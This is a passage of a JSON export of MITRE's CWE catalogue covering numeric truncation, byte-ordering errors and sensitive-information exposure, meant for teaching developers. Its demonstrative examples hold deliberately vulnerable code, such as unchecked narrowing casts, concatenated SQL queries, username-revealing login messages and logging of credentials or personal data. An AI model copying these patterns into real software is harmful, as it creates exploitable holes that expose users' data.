223"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}]}},"197":{"attr":{"@_ID":"197","@_Name":"Numeric Truncation Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Truncation errors occur when a primitive is cast to a primitive of a smaller size and data is lost in the conversion.","Extended_Description":"When a primitive is cast to a smaller primitive, the high order bits of the large value are lost in the conversion, potentially resulting in an unexpected value that is not equal to the original value. This value may be required as an index into a buffer, a loop iterator, or simply necessary state data. In any case, the value cannot be trusted and the system will be in an undefined state. While this method may be employed viably to isolate the low bits of a value, this usage is rare, and truncation usually implies that an implementation error has occurred.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"195","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"196","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"192","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"194","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Memory","Note":"The true value of the data is lost and corrupted data is used."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that no casts, implicit or explicit, take place that move from a larger size primitive or a smaller size primitive."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example, while not exploitable, shows the possible mangling of values associated with truncation errors:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int intPrimitive;short shortPrimitive;intPrimitive = (int)(~((int)0) ^ (1 &lt;&lt; (sizeof(int)*8-1)));shortPrimitive = intPrimitive;printf(\\"Int MAXINT: %d\\\\nShort MAXINT: %d\\\\n\\", intPrimitive, shortPrimitive);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"Int MAXINT: 2147483647Short MAXINT: -1","xhtml:br":""}}],"Body_Text":["The above code, when compiled and run on certain systems, returns the following output:","This problem may be exploitable when the truncated value is used as an array index, which can happen implicitly when 64-bit values are used as indexes, as they are truncated to 32 bits."]},{"Intro_Text":"In the following Java example, the method updateSalesForProduct is part of a business application class that updates the sales information for a particular product. The method receives as arguments the product ID and the integer amount sold. The product ID is used to retrieve the total product count from an inventory object which returns the count as an integer. Before calling the method of the sales object to update the sales count the integer values are converted to The primitive type short since the method requires short type for the method arguments.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...public void updateSalesForProduct(String productID, int amountSold) {}...","xhtml:br":["","",""],"xhtml:i":"// update sales database for number of product sold with product ID","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int productCount = inventory.getProductCount(productID);short count = (short) productCount;short sold = (short) amountSold;sales.updateSalesCount(productID, count, sold);","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get the total number of products in inventory database","// convert integer values to short, the method for the","// sales object requires the parameters to be of type short","// update sales database for product"]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"...public void updateSalesForProduct(String productID, int amountSold) {}...","xhtml:br":["","",""],"xhtml:i":"// update sales database for number of product sold with product ID","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int productCount = inventory.getProductCount(productID);if ((productCount &lt; Short.MAX_VALUE) &amp;&amp; (amountSold &lt; Short.MAX_VALUE)) {else {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get the total number of products in inventory database","// make sure that integer numbers are not greater than","// maximum value for type short before converting","// throw exception or perform other processing"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"short count = (short) productCount;short sold = (short) amountSold;sales.updateSalesCount(productID, count, sold);","xhtml:br":["","","","","","",""],"xhtml:i":["// convert integer values to short, the method for the","// sales object requires the parameters to be of type short","// update sales database for product"]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"However, a numeric truncation error can occur if the integer values are higher than the maximum value allowed for the primitive type short. This can cause unexpected results or loss or corruption of data. In this case the sales database may be corrupted with incorrect data. Explicit casting from a from a larger size primitive type to a smaller size primitive type should be prevented. The following example an if statement is added to validate that the integer values less than the maximum value for the primitive type short before the explicit cast and the call to the sales method."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-0231","Description":"Integer truncation of length value leads to heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0231"},{"Reference":"CVE-2008-3282","Description":"Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3282"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Numeric truncation error"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Truncation error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO34-C","Entry_Name":"Distinguish between characters read from a file and EOF or WEOF","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP34-C","Entry_Name":"Ensure that floating point conversions are within range of the new type","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT02-C","Entry_Name":"Understand integer conversion rules"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT05-C","Entry_Name":"Do not use input functions to convert character data if they cannot handle all possible inputs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"NUM12-J","Entry_Name":"Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Truncation&#34;, Page 259"}}},"Notes":{"Note":{"#text":"This weakness has traditionally been under-studied and under-reported, although vulnerabilities in popular software have been published in 2008 and 2009.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Observed_Examples, Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"198":{"attr":{"@_ID":"198","@_Name":"Use of Incorrect Byte Ordering","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not account for byte ordering (e.g. big-endian and little-endian) when processing the input, causing an incorrect number or value to be used.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"188","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Detection_Methods":{"Detection_Method":{"Method":"Black Box","Description":"Because byte ordering bugs are usually very noticeable even with normal inputs, this bug is more likely to occur in rarely triggered error conditions, making them difficult to detect using black box methods."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Numeric Byte Ordering Error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO12-J","Entry_Name":"Provide methods to read and write little-endian data"}]},"Notes":{"Note":{"#text":"Under-reported.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Detection_Factors, Relationships, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}],"Previous_Entry_Name":{"#text":"Numeric Byte Ordering Error","attr":{"@_Date":"2008-04-11"}}}},"200":{"attr":{"@_ID":"200","@_Name":"Exposure of Sensitive Information to an Unauthorized Actor","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.","Extended_Description":{"xhtml:p":["There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker.  Some kinds of sensitive information include:","Information might be sensitive to different parties, each of which may have their own expectations for whether the information should be protected.  These parties include:","Information exposures can occur in different ways:","It is common practice to describe any loss of confidentiality as an \\"information exposure,\\" but this can lead to overuse of CWE-200 in CWE mapping. From the CWE perspective, loss of confidentiality is a technical impact that can arise from dozens of different weaknesses, such as insecure file permissions or out-of-bounds read.  CWE-200 and its lower-level descendants are intended to cover the mistakes that occur in behaviors that explicitly manage, store,  transfer, or cleanse sensitive information."],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["private, personal information, such as personal messages, financial data, health records, geographic location, or contact details","system status and environment, such as the operating system and installed packages","business secrets and intellectual property","network status and configuration","the product\'s own code or internal state","metadata, e.g. logging of connections or message headers","indirect information, such as a discrepancy between two internal operations that can be observed by an outsider"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["the product\'s own users","people or organizations whose information is created or used by the product, even if they are not direct product users","the product\'s administrators, including the admins of the system(s) and/or networks on which the product operates","the developer"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":[{"#text":"the codesensitive information into resources or messages that are intentionally made accessible to unauthorized actors, but should not contain the information - i.e., the information should have been \\"scrubbed\\" or \\"sanitized\\"","xhtml:b":"explicitly inserts"},{"#text":"a different weakness or mistakethe sensitive information into resources, such as a web script error revealing the full system path of the program.","xhtml:b":"indirectly inserts"},{"#text":"the code manages resources that intentionally contain sensitive information, but the resources areto unauthorized actors. In this case, the information exposure is resultant - i.e., a different weakness enabled the access to the information in the first place.","xhtml:b":"unintentionally made accessible"}]}}]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"Developers may insert sensitive information that they do not believe, or they might forget to remove the sensitive information after it has been processed"},{"Ordinality":"Resultant","Description":"Separate mistakes or weaknesses could inadvertently make the sensitive information available to an attacker, such as in a detailed error message that can be read by an unauthorized party"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Information Disclosure","Description":"This term is frequently used in vulnerability advisories to describe a consequence or technical impact, for any vulnerability that has a loss of confidentiality. Often, CWE-200 can be misused to represent the loss of confidentiality, even when the mistake - i.e., the weakness - is not directly related to the mishandling of the information itself, such as an out-of-bounds read that accesses sensitive memory contents; here, the out-of-bounds read is the primary weakness, not the disclosure of the memory.  In addition, this phrase is also used frequently in policies and legal documents, but it does not refer to any disclosure of security-relevant information."},{"Term":"Information Leak","Description":"This is a frequently used term, however the \\"leak\\" term has multiple uses within security. In some cases it deals with the accidental exposure of information from a different weakness, but in other cases (such as \\"memory leak\\"), this deals with improper tracking of resources, which can lead to exhaustion. As a result, CWE is actively avoiding usage of the \\"leak\\" term."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Inter-application Flow Analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source code Weakness Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Attack Modeling","Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-38"},"Intro_Text":"The following code checks validity of the supplied username and password and notifies the user of a successful or failed login.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $username=param(\'username\');my $password=param(\'password\');if (IsValidUsername($username) == 1){}else{}","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"if (IsValidPassword($username, $password) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"print \\"Login Successful\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Login Failed - incorrect password\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"print \\"Login Failed - unknown username\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"\\"Login Failed - incorrect username or password\\""}],"Body_Text":["In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials.","While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as:"]},{"attr":{"@_Demonstrative_Example_ID":"DX-118"},"Intro_Text":"This code tries to open a database connection, and prints any exceptions that occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (Exception $e) {}","xhtml:div":[{"#text":"openDbConnection();","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'Caught exception: \', $e-&gt;getMessage(), \'\\\\n\';echo \'Check credentials in config file at: \', $Mysql_config_location, \'\\\\n\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""],"xhtml:i":"//print exception message that includes exception message and configuration file location"}},"Body_Text":"If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database."},{"attr":{"@_Demonstrative_Example_ID":"DX-119"},"Intro_Text":"In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount getUserBankAccount(String username, String accountNumber) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount userAccount = null;String query = null;try {} catch (SQLException ex) {}return userAccount;","xhtml:br":["","",""],"xhtml:div":[{"#text":"if (isAuthorizedUser(username)) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"query = \\"SELECT * FROM accounts WHERE owner = \\"+ username + \\" AND accountID = \\" + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}},{"#text":"String logMessage = \\"Unable to retrieve account information from database,\\\\nquery: \\" + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-120"},"Intro_Text":"This code stores location information about the current user:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();currentUser.setLocation(locationClient.getLastLocation());catch (Exception e) {}","xhtml:br":["","","","",""],"xhtml:i":"...","xhtml:div":{"#text":"AlertDialog.Builder builder = new AlertDialog.Builder(this);builder.setMessage(\\"Sorry, this application has experienced an error.\\");AlertDialog alert = builder.create();alert.show();Log.e(\\"ExampleActivity\\", \\"Caught exception: \\" + e + \\" While on User:\\" + User.toString());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user\'s location is also written to the log."},{"attr":{"@_Demonstrative_Example_ID":"DX-129"},"Intro_Text":"The following is an actual MySQL error statement:","Example_Code":{"attr":{"@_Nature":"result","@_Language":"SQL"},"xhtml:div":"Warning: mysql_pconnect(): Access denied for user: \'root@localhost\' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4"},"Body_Text":"The error clearly exposes the database credentials."},{"attr":{"@_Demonstrative_Example_ID":"DX-130"},"Intro_Text":"This code displays some information on a web page.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":"Social Security Number: &lt;%= ssn %&gt;&lt;/br&gt;Credit Card Number: &lt;%= ccn %&gt;"},"Body_Text":"The code displays a user\'s credit card and social security numbers, even though they aren\'t absolutely necessary."},{"attr":{"@_Demonstrative_Example_ID":"DX-131"},"Intro_Text":"The following program changes its behavior based on a debug flag.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;% if (Boolean.getBoolean(\\"debugEnabled\\")) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"%&gt;User account number: &lt;%= acctNo %&gt;&lt;%} %&gt;","xhtml:br":["","","",""]}}}},"Body_Text":"The code writes sensitive debug information to the client browser if the \\"debugEnabled\\" flag is set to true ."},{"attr":{"@_Demonstrative_Example_ID":"DX-111"},"Intro_Text":"This code uses location to determine the user\'s current US State location.","Body_Text":["First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application\'s manifest.xml:","During execution, a call to getLastLocation() will return a location based on the application\'s location permissions. In this case the application has permission for the most accurate location possible:","While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":"&lt;uses-permission android:name=\\"android.permission.ACCESS_FINE_LOCATION\\"/&gt;"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation);","xhtml:br":["","","",""]}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1483","Description":"Enumeration of valid usernames based on inconsistent responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483"},{"Reference":"CVE-2001-1528","Description":"Account number enumeration via inconsistent responses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528"},{"Reference":"CVE-2004-2150","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150"},{"Reference":"CVE-2005-1205","Description":"Telnet protocol allows servers to obtain sensitive environment information from clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1205"},{"Reference":"CVE-2002-1725","Description":"Script calls phpinfo(), revealing system configuration to web user","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1725"},{"Reference":"CVE-2002-0515","Description":"Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515"},{"Reference":"CVE-2004-0778","Description":"Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778"},{"Reference":"CVE-2000-1117","Description":"Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"},{"Reference":"CVE-2008-2049","Description":"POP3 server reveals a password in an error message after multiple APOP commands are sent. Might be resultant from another 